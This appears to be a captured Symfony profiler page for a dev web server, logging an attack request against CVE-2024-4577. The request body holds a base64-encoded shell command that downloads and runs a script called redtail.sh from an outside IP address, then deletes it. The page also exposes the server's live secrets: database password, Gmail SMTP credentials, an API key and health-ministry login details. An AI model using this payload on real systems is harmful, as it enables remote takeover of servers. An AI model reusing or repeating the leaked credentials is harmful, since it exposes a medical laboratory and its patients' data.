n/a
Request
GET Parameters
| Key | Value |
|---|---|
| �d_allow_url_include=1_�d_auto_prepend_file=php://input | "" |
POST Parameters
| Key | Value |
|---|---|
| <?php_shell_exec(base64_decode("Y2QgL3RtcCB8fCBjZCAvdmFyL3RtcDsgY3VybCBodHRwOi8vMTc4LjE2LjU1LjIyNC9zaCAtbyByZWR0YWlsLnNoIHx8IHdnZXQgaHR0cDovLzE3OC4xNi41NS4yMjQvc2ggLU8gcmVkdGFpbC5zaDsgY2htb2QgK3ggcmVkdGFpbC5zaDsgLi9yZWR0YWlsLnNoIGN2ZV8yMDI0XzQ1Nzcuc2VsZnJlcDsgcm0gLXJmIHJlZHRhaWwuc2g | "")); echo(md5("Hello CVE-2024-4577")); ?>" |
Uploaded Files
No files were uploaded
Request Attributes
No attributes
Request Headers
| Header | Value |
|---|---|
| accept | "*/*" |
| authorization | "" |
| connection | "keep-alive" |
| content-length | "325" |
| content-type | "application/x-www-form-urlencoded" |
| host | "91.121.87.50:80" |
| upgrade-insecure-requests | "1" |
| user-agent | "libredtail-http" |
| x-php-ob-level | "1" |
Request Content
Raw
<?php shell_exec(base64_decode("Y2QgL3RtcCB8fCBjZCAvdmFyL3RtcDsgY3VybCBodHRwOi8vMTc4LjE2LjU1LjIyNC9zaCAtbyByZWR0YWlsLnNoIHx8IHdnZXQgaHR0cDovLzE3OC4xNi41NS4yMjQvc2ggLU8gcmVkdGFpbC5zaDsgY2htb2QgK3ggcmVkdGFpbC5zaDsgLi9yZWR0YWlsLnNoIGN2ZV8yMDI0XzQ1Nzcuc2VsZnJlcDsgcm0gLXJmIHJlZHRhaWwuc2g=")); echo(md5("Hello CVE-2024-4577")); ?>
Response
Response Headers
| Header | Value |
|---|---|
| cache-control | "no-cache, private" |
| content-type | "text/html; charset=UTF-8" |
| date | "Sat, 13 Sep 2025 21:53:12 GMT" |
| x-debug-token | "b7f9d8" |
Cookies
Request Cookies
No request cookies
Response Cookies
No response cookies
Session
Session Metadata
No session metadata
Session Attributes
No session attributes
Flashes
Flashes
No flash messages were created.
Server Parameters
Server Parameters
Defined in .env
| Key | Value |
|---|---|
| ADMIN_PASSWORD | "$2y$13$lwES.9w3pbsT6S3xMrUP7.a53ASi2izmlFOV0MCiUmY5/KNpe9i9i" |
| APP_ENV | "dev" |
| APP_SECRET | "9cfd3f94eab632ad76e0b331cf1da921385e6e2b" |
| AUTHORIZATION_LISTENER_PASSWORD | "password" |
| AUTHORIZATION_LISTENER_USERNAME | "admin-listener" |
| AUTHORIZATION_PASSWORD | "password" |
| AUTHORIZATION_USERNAME | "admin-user" |
| CORS_ALLOW_ORIGIN | "^https?://(localhost|127\.0\.0\.1)(:[0-9]+)?$" |
| CSNTESTEN_API_KEY | "bpo4wSmYJ3riyuYtMsdfu5XZPYuzad9zEN4CvECEwSAFaoKxZjFqFbW8jjz3dpJS" |
| CSNTESTEN_BASE_URL | "https://staging-tvv.csntesten.nl/api/results" |
| DATABASE_URL | "mysql://dvp_dev_dual:ragWa3R762dNGb@127.0.0.1:3306/dv_pocket_dev_dual?serverVersion=5.6" |
| LAB_NIF | "505087723" |
| MAILER_DEBUG | "stabvida.ceo@gmail.com" |
| MAILER_DEFAULT | "stabvida.doctorvida.email@gmail.com" |
| MAILER_DSN | "smtp://stabvida.doctorvida.email@gmail.com:thwohnhhnqmlxyzg@smtp.gmail.com?verify_peer=0" |
| MAILER_FROM | "noreply@doctorvida.com" |
| MQTT_BROKER_HOST | "91.121.87.50" |
| MQTT_BROKER_PORT | "1883" |
| SINAVE_PASSWORD | "STBVD#234" |
| SINAVE_URL | "https://sinave-qua.min-saude.pt:443/WSNotificacaoLaboratorial/NotificacaoLaboratorialImplService?WSDL" |
| SINAVE_USERNAME | "STABVIDA" |
| SINAVE_VALIDATOR | "stabvida" |
Defined as regular env variables
| Key | Value |
|---|---|
| APP_DEBUG | "1" |
| CONTENT_LENGTH | "325" |
| CONTENT_TYPE | "application/x-www-form-urlencoded" |
| CONTEXT_DOCUMENT_ROOT | "/home/webapp/apps/doctorvida-pocket-dev-dual/current/public" |
| CONTEXT_PREFIX | "" |
| DOCUMENT_ROOT | "/home/webapp/apps/doctorvida-pocket-dev-dual/current/public" |
| FCGI_ROLE | "RESPONDER" |
| GATEWAY_INTERFACE | "CGI/1.1" |
| HOME | "/usr/share/httpd" |
| HTTP_ACCEPT | "*/*" |
| HTTP_AUTHORIZATION | "" |
| HTTP_CONNECTION | "keep-alive" |
| HTTP_HOST | "91.121.87.50:80" |
| HTTP_UPGRADE_INSECURE_REQUESTS | "1" |
| HTTP_USER_AGENT | "libredtail-http" |
| PATH | "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin" |
| PHP_SELF | "/index.php" |
| QUERY_STRING | "%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" |
| REMOTE_ADDR | "38.146.30.200" |
| REMOTE_PORT | "40494" |
| REQUEST_METHOD | "POST" |
| REQUEST_SCHEME | "http" |
| REQUEST_TIME | 1757800392 |
| REQUEST_TIME_FLOAT | 1757800392.3796 |
| REQUEST_URI | "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" |
| SCRIPT_FILENAME | "/home/webapp/apps/doctorvida-pocket-dev-dual/current/public/index.php" |
| SCRIPT_NAME | "/index.php" |
| SCRIPT_URI | "http://91.121.87.50/" |
| SCRIPT_URL | "/" |
| SERVER_ADDR | "91.121.87.50" |
| SERVER_ADMIN | "root@localhost" |
| SERVER_NAME | "91.121.87.50" |
| SERVER_PORT | "80" |
| SERVER_PROTOCOL | "HTTP/1.1" |
| SERVER_SIGNATURE | "" |
| SERVER_SOFTWARE | "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips Phusion_Passenger/6.0.22 PHP/7.4.33" |
| SYMFONY_DOTENV_VARS | "ADMIN_PASSWORD,APP_ENV,APP_SECRET,DATABASE_URL,CORS_ALLOW_ORIGIN,MAILER_DSN,MAILER_FROM,MAILER_DEBUG,SINAVE_URL,SINAVE_USERNAME,SINAVE_PASSWORD,SINAVE_VALIDATOR,LAB_NIF,CSNTESTEN_BASE_URL,CSNTESTEN_API_KEY,MQTT_BROKER_HOST,MQTT_BROKER_PORT,AUTHORIZATION_USERNAME,AUTHORIZATION_PASSWORD,AUTHORIZATION_LISTENER_USERNAME,AUTHORIZATION_LISTENER_PASSWORD,MAILER_DEFAULT" |
| UNIQUE_ID | "aMXnyNQZTH5R3iIYZtS21wAAAA8" |
| USER | "apache" |
| proxy-nokeepalive | "1" |